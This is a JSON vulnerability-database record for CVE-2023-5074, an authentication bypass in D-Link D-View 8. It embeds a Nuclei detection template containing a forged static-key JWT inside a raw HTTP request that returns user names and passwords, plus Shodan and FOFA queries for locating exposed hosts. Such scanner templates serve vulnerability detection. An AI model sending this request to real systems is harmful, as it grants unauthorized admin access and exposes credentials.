{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-5074/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-5074/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-5074/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-5074/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-5074/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-5074"},"sightings":{"href":"/api/v1/sightings/cve-2023-5074"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-5074.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-5074\n\ninfo:\n  name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n  impact: |\n    Unauthenticated attackers can exploit static JWT keys to forge authentication tokens and bypass authentication to gain administrative access to D-Link D-View systems.\n  remediation: |\n    Upgrade to the latest version to mitigate this vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2023-32\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-5074\n    - https://github.com/codeb0ss/CVE-2023-5074-PoC\n    - https://github.com/nomi-sec/PoC-in-GitHub\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-5074\n    cwe-id: CWE-798\n    epss-score: 0.69555\n    epss-percentile: 0.99343\n    cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dlink\n    product: d-view_8\n    shodan-query:\n      - http.favicon.hash:-1317621215\n      - http.favicon.hash:\"-1317621215\"\n    fofa-query: icon_hash=\"-1317621215\"\n  tags: cve2023,cve,d-link,auth-bypass,dlink,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /dview8/api/usersByLevel HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")'\n          - 'contains(header, \"application/json\")'\n        condition: and\n# digest: 4a0a0047304502200301065d8bb2843a1f565d27961e625a668d5c92e055aee8c71f868bc7997ba7022100c74f3721ea574a534105dd8ee71400f4d0da41ed1e1243928a5ceef79c773c30:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-5074"}